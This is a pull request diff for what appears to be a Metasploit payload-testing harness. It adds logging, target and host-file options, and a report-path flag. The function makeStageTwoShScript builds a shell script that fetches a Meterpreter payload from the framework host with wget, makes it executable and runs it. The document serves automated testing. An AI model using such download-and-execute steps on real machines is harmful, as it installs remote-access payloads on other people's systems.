### PR TITLE
Physical Target and email changes

### DIFF
--- a/apt_shared.py
+++ b/apt_shared.py
@@ -746,8 +746,9 @@ def makeStageTwoShScript(targetData, httpPort, remoteLogFile, terminationToken):
         if 'PAYLOAD' in sessionData and sessionData['MODULE']['NAME'].lower() == "exploit/multi/handler":
             msfIpAddress = sessionData['MSF_HOST']['IP_ADDRESS']
             payloadFile = sessionData['PAYLOAD']['FILENAME']
-            url = "'http://" + msfIpAddress + ":" + str(httpPort) + "/" + payloadFile + "'\n"
-            stageTwoShContent = stageTwoShContent + "\nwget " + url + "\n"
+            url = "'http://" + msfIpAddress + ":" + str(httpPort) + "/" + payloadFile + "'"
+            stageTwoShContent = stageTwoShContent + "echo URL =  " + url + " > " + remoteLogFile + "\n"
+            stageTwoShContent = stageTwoShContent + "\nwget " + url + " >> " + remoteLogFile + " 2>&1\n"
             stageTwoShContent = stageTwoShContent + "sleep 5 \n"
             stageTwoShContent = stageTwoShContent + "chmod 755 " + payloadFile + "\n"
             if '.py' in payloadFile:
@@ -756,7 +757,9 @@ def makeStageTwoShScript(targetData, httpPort, remoteLogFile, terminationToken):
                 stageTwoShContent = stageTwoShContent + targetData['METERPRETER_JAVA'] + " -jar " + payloadFile + "&\n"
             else:
                 stageTwoShContent = stageTwoShContent + "./" + payloadFile + "&\n"
-            stageTwoShContent = stageTwoShContent + "echo " + terminationToken + " > " + remoteLogFile + "\n"
+            stageTwoShContent = stageTwoShContent + "netstat -ant >> " + remoteLogFile + " 2>&1\n"
+            stageTwoShContent = stageTwoShContent + "ps -ef >> " + remoteLogFile + "\n"
+            stageTwoShContent = stageTwoShContent + "echo " + terminationToken + " >> " + remoteLogFile + "\n"
     return stageTwoShContent
 
 
@@ -1610,5 +1613,5 @@ def __matchListToCatalog(vm_List, catalog_file, logFile="default.log"):
             if "PASSWORD" not in final_vm:
                 logMsg(logFile, "NO PASSWORD FOR " + str(vm))
                 return False
-            defined_vms.append(final_vm)
+        defined_vms.append(final_vm)
     return defined_vms

--- a/apt_shared.py
+++ b/apt_shared.py
@@ -750,15 +750,20 @@ def makeStageTwoShScript(targetData, httpPort, remoteLogFile, terminationToken):
             stageTwoShContent = stageTwoShContent + "echo URL =  " + url + " > " + remoteLogFile + "\n"
             stageTwoShContent = stageTwoShContent + "\nwget " + url + " >> " + remoteLogFile + " 2>&1\n"
             stageTwoShContent = stageTwoShContent + "sleep 5 \n"
-            stageTwoShContent = stageTwoShContent + "chmod 755 " + payloadFile + "\n"
+            stageTwoShContent = stageTwoShContent + "chmod 755 " + payloadFile + " >> " + remoteLogFile + " 2>&1\n"
+            stageTwoShContent = stageTwoShContent + "echo \"test\n\n\" >> " + remoteLogFile + "\n"
+            stageTwoShContent = stageTwoShContent + "echo \"ls\n\n\" >> " + remoteLogFile + "\n"
+            stageTwoShContent = stageTwoShContent + "ls -lart " + payloadFile + " >> " + remoteLogFile + " 2>&1\n"
+            stageTwoShContent = stageTwoShContent + "file " + payloadFile + " >> " + remoteLogFile + " 2>&1\n"
             if '.py' in payloadFile:
                 stageTwoShContent = stageTwoShContent + targetData['METERPRETER_PYTHON'] + " " + payloadFile + "&\n"
             elif 'jar' in payloadFile:
                 stageTwoShContent = stageTwoShContent + targetData['METERPRETER_JAVA'] + " -jar " + payloadFile + "&\n"
             else:
                 stageTwoShContent = stageTwoShContent + "./" + payloadFile + "&\n"
+            stageTwoShContent = stageTwoShContent + "sleep 5 \n"
             stageTwoShContent = stageTwoShContent + "netstat -ant >> " + remoteLogFile + " 2>&1\n"
-            stageTwoShContent = stageTwoShContent + "ps -ef >> " + remoteLogFile + "\n"
+            stageTwoShContent = stageTwoShContent + "ps -ef >> " + remoteLogFile + "\n\n"
             stageTwoShContent = stageTwoShContent + "echo " + terminationToken + " >> " + remoteLogFile + "\n"
     return stageTwoShContent
 

--- a/autoPayloadTest.py
+++ b/autoPayloadTest.py
@@ -10,7 +10,7 @@ def main():
     parser.add_argument("-m", "--module", help="Module to use")
     parser.add_argument("-t", "--targetName", help="Target CPE/OS/NAME to use (Overrides testfile)")
     parser.add_argument("-p", "--payload", help="Meterpreter payload to use")
-    parser.add_argument("-po", "--payloadoptions", help="Comma delineated venom-style settings for the given payload: attribute=x,attribute2=y...")
+    parser.add_argument("-po", "--payloadOptions", help="Comma delineated venom-style settings for the given payload: attribute=x,attribute2=y...")
     parser.add_argument("testfile", help="json test file to use")
     args = parser.parse_args()
 

--- a/autoPayloadTest.py
+++ b/autoPayloadTest.py
@@ -106,6 +106,8 @@ def main():
     """
     apt_shared.logMsg(configData['LOG_FILE'], "WAITING FOR ALL TASKS TO COMPLETE")
     time.sleep(5)
+    if args.verboseFilename:
+        print("REPORT_LOCATION: " + configData['REPORT_DIR'] + "/" + configData['REPORT_PREFIX'] + ".html")
     if testResult:
         apt_shared.logMsg(configData['LOG_FILE'], "TEST SUCCEEDED")
         if args.verbose:

--- a/autoPayloadTest.py
+++ b/autoPayloadTest.py
@@ -5,7 +5,10 @@ import time
 
 def main():
     parser = argparse.ArgumentParser()
+    parser.add_argument("-tf", "--targetFile", help="Override target section")
+    parser.add_argument("-mh", "--msfHostsFile", help="Override MSF_HOSTS section")
     parser.add_argument("-v", "--verbose", help="Echo test result to console", action="store_true")
+    parser.add_argument("-vf", "--verboseFilename", help="Echo report filename to console", action="store_true")
     parser.add_argument("-f", "--framework", help="Framework branch to use (Overrides testfile)")
     parser.add_argument("-m", "--module", help="Module to use")
     parser.add_argument("-t", "--targetName", help="Target CPE/OS/NAME to use (Overrides testfile)")


### PR DESCRIPTION
This PR updates the automated testing to support 
1) Physical hosts 
2) A new option to return the location of the generated files to support a separate email testing system.
3) Adds to the Linux logging verbosity to assist in troubleshooting
4) Fixes a typo in the payloadOptions command-line argument